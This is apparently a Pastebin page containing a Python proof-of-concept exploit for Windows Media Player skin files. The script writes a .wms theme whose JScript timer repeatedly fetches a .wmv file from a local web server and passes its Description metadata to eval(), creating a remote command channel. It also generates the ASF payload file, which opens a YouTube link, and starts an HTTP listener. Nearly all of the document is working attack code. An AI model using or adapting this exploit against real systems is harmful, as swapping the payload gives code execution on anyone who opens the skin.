Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- def random_payload():
- import random
- payloads = [
- bytes.fromhex('3026b2758e66cf11a6d900aa0062ce6c6907000000000000080000000102a1dcab8c47a9cf118ee400c00c205365680000000000000000000000000000000000000000000000170200000000000000803ed5deb19d010000000000000000c005d9010000000000000000000000001c0c00000000000002000000800c0000800c000058480300b503bf5f2ea9cf118ee300c00c205365e80000000000000011d2d3abbaa9cf118ee600c00c2053650600ba000000eacbf8c5af5b77488467aa8c44fa4ccaba000000000000000400000001000c000200020000004900730056004200520000000000000001001a0003000400000041007300700065006300740052006100740069006f005800000001000000000001001a0003000400000041007300700065006300740052006100740069006f00590000000100000000000100220003000400000056006900640065006f004f007200690065006e0074006100740069006f006e0000000000000040a4d0d207e3d21197f000a0c95ea850ba000000000000000300280057004d002f0045006e0063006f00640069006e006700530065007400740069006e0067007300000000001c004c00610076006600350037002e00340031002e0031003000300000000c0049007300560042005200000002000400000000002e004d00650064006900610046006f0075006e0064006100740069006f006e00560065007200730069006f006e00000000000c0032002e0031003100320000009107dcb7b7a9cf118ee600c00c2053658100000000000000c0ef19bc4d5bcf11a8fd00805f5c442b0057fb20555bcf11a8fd00805f5c442b000000000000000033000000000000000100000000000100000001000000022800280000000100000001000000010018004d50343303000000000000000000000000000000000000004052d1861d31d011a3a400a0c90348f64c000000000000004152d1861d31d011a3a400a0c90348f60100000001000a006d0073006d007000650067003400760033000000000004004d5034333326b2758e66cf11a6d900aa0062ce6ca4000000000000000000000000008200000070006c0061007900650072002e006c00610075006e0063006800550052004c0028002700680074007400700073003a002f002f007700770077002e0079006f00750074007500620065002e0063006f006d002f00770061007400630068003f0076003d0064005100770034007700390057006700580063005100270029003b00000074d40618dfca0945a4ba9aabcb96aae8b0030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ce75f87b8d46d1118d82006097c9a2b2200000000000000001000100584803003626b2758e66cf11a6d900aa0062ce6c32000000000000000000000000000000000000000000000000000000000000000101')
- ]
- return random.choice(payloads)
- def setup_listener():
- from subprocess import call
- call(["python", "-m", "http.server", "80"])
- def generate_wms():
- wms = """<THEME>
- <VIEW
- title="PoC - @notwhickey"
- onload="JScript: view.timerInterval=5000;"
- ontimer="JScript: player.settings.enableErrorDialogs=false; function d(){ player.url='http://127.0.0.1/'+'exploit'+'.wmv?response='+view.title;}; d(); "
- >
- <player PlayState_onchange="JScript: try { view.title=eval(player.currentmedia.getItemInfo('Description'));} catch (e) {view.title=':(';} " />
- <VIDEO
- top = "69"
- left = "420"
- width = "1"
- height = "1"
- />
- </VIEW>
- </THEME>
- """
- with open('PoC.wms','w+') as poc:
- poc.write(wms)
- return
- def create_c2_command():
- with open('exploit.wmv', 'wb') as c2:
- c2.write(random_payload())
- def main():
- generate_wms()
- create_c2_command()
- setup_listener()
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement